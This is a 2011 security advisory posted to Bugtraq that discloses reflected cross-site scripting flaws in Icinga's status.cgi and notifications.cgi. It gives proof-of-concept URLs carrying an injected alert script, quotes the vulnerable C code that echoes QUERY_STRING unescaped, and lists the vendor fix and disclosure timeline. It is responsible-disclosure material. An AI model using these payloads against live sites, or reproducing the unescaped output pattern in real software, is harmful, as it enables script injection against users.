| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201103081515.p28FFuaE006526@www3.securityfocus.com>
Date: Tue, 8 Mar 2011 08:15:56 -0700
From: sschurtz@...nline.de
To: bugtraq@...urityfocus.com
Subject: Cross-Site Scripting vulnerabilities in Icinga
Advisory: Cross-Site Scripting vulnerabilities in Icinga
Advisory ID: SSCHADV2011-001
Author: Stefan Schurtz
Affected Software: Successfully tested on: icinga-1.3.0 / icinga-1.2.1
Vendor URL: http://www.icinga.org
Vendor Status: fixed csv export link to make it XSS save (IE) #1275
CVE-ID: -
==========================
Vulnerability Description:
==========================
This is Cross-Site Scripting vulnerability
==================
Technical Details:
==================
No input validation for "QUERY_STRING"
Problem in "status.c"
http://site/icinga/cgi-bin/status.cgi?'</style></script><script>alert('XSS')</script>
http://site/icinga/cgi-bin/status.cgi?'</style></script><script>alert('XSS')</script><A HREF='status.cgi
/* add export to csv link */
if(getenv("QUERY_STRING")!=NULL) {
printf("<td valign=bottom width=33%%><div class='csv_export_link'><a href='%s?%s&csvoutput' target='_blank'>Export to CSV</a></div></td>n",STATUS_CGI,strdup(getenv("QUERY_STRING")));
} else {
printf("<td valign=bottom width=33%%><div class='csv_export_link'><a href='%s?csvoutput' target='_blank'>Export to CSV</a></div></td>n",STATUS_CGI);
Problem in "notification.c"
http://site/icinga/cgi-bin/notifications.cgi?'</style></script><script>alert('XSS')</script>
http://site/icinga/cgi-bin/notifications.cgi?'</style></script><script>alert('XSS')</script><A HREF='notifications.cgi
if(getenv("QUERY_STRING")!=NULL) {
printf("<TR><TD colspan='7'><DIV class='csv_export_link'><A HREF='%s?%s&csvoutput' target='_blank'>Export to CSV</A></DIV></TD></TR>n",NOTIFICATIONS_CGI,strdup(getenv("QUERY_STRING")));
} else {
printf("<TR><TD colspan='7'><DIV class='csv_export_link'><A HREF='%s?csvoutput' target='_blank'>Export to CSV</A></DIV></TD></TR>n",NOTIFICATIONS_CGI);
}
=========
Solution:
=========
ID: 90c2209dfc7b8b6a174f46eb5d2a87d1a9789383
https://dev.icinga.org/projects/icinga-core/repository/revisions/90c2209dfc7b8b6a174f46eb5d2a87d1a9789383/diff
fixed csv export link to make it XSS save (IE) #1275
====================
Disclosure Timeline:
====================
04-Mar-2011 - informed developers
07-Mar-2011 - Bug 1275 - make csv export link XSS save - on "Icinga Development Mailinglist"
07-Mar-2011 - informed DFN-CERT - cert@...-cert.de
07-Mar-2011 - Release date of this security advisory
07-Mar-2011 - developers fixed csv export link to make it XSS save (IE) #1275
========
Credits:
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.icinga.org
http://www.rul3z.de/advisories/SSCHADV2011-001.txt
Powered by blists - more mailing lists